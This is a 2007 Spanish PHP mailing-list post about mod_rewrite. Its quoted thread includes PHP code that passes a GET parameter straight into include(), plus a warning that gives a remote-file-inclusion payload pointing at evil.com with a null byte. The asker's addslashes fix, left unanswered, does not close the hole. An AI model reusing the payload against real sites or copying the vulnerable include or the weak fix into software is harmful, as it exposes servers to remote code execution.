1/2 OT Mod_Rewrite Apache
Boris Cruchet
b en guliv.cl
Vie Feb 9 09:14:15 CLST 2007
Mejor lee algun tutorial del mod_rewrite es muy sencillo de usar y hace
lo que necesitas !!!
no reinventes la rueda !!
http://im7.blogspirit.com/archive/2005/05/12/usando_el_mod_rewrite_de_apache.html
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Cristian Rodriguez escribió:
>>> $gls_sec =$_GET['gls_sec'];
>>> if($gls_sec!=""){
>>> include($gls_sec.".php");
>>
>> las tres primeras lienase de tu codigo tienen un atroz agujero de
>> seguridad.
>>
>> si $_GET['gls_sec'] es por ejemplo
>>
>> $_GET['gls_sec'] = "http://www.evil.com/evil.txt%00" (notese el NULL
>> byte al final)
>> PHP descarta el ".php" (y el resto de la sentencia) incluyendo el
>> archivo remoto http://www.evil.com/evil.txt y intepretandolo como
>> codigo PHP. en fin the OwNean :-P
>>
>
> Como debería ser entonces, algo asi? Como mejoraría la seguridad?
> if (isset($_GET['gls_sec'])) {
> $num_p = (get_magic_quotes_gpc()) ? $_GET['gls_sec'] :
> addslashes($_GET['gls_sec']);
>
> Gracias por la advertencia..
>
>
> Boris Cruchet escribió:
>> si quieres modificar la URL ... tendrias que redireccionar
>>
>> ahora, pone atencion a la variable que pasa por $_GET, asi como muestras
>> en el ejemplo es muy sencillo que te vulneren tu sitio.
>>
>> finalmente, yo tenia entendido que mod_rewrite es precisamente para
>> hacer
>> eso que tu quieres hacer no ?
>>
>>
> Si exactamente
>
> - --
> Daniel Carrero C.
> Departamento de Informática
> I. Municipalidad de Vallenar
>
> - --Usuario Linux #409411 (counter.li.org)--
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iQEVAwUBRcxefwuMB6lNNgQqAQJ/XAf/fwwxYQLBIAHHRqibVmXOgSJhFhfUG4Qv
> WU1Zp64V6hNzDJGueAogs192Ni6OB3rzdIoSSTx14ZxpztVCdhpaIihpoo1LhO3c
> iocI8xUk4dnYRyIGT4H5lahXD01imSBih8sJnm3uZcfXulB8yEhrABPKtAauSuob
> 6/Fgs4UG1MZhQyAz3KvWzIAxKKJhh2D7+oHQYbnExrQJMQ4BAEeYMxGxlusk9XwZ
> ja1t+fqWu5sHR/wlSD2xvBQFhP0KakV7WH9u7Qkeld5QMJHFTFFP59XCZ/0jclNW
> /kA9VhfPlJ8gX9h7GB6xNC0al7UrktB0zgjckMEzIOiFAyrMi++MbA==
> =lXgr
> -----END PGP SIGNATURE-----
>
Más información sobre la lista de distribución PHP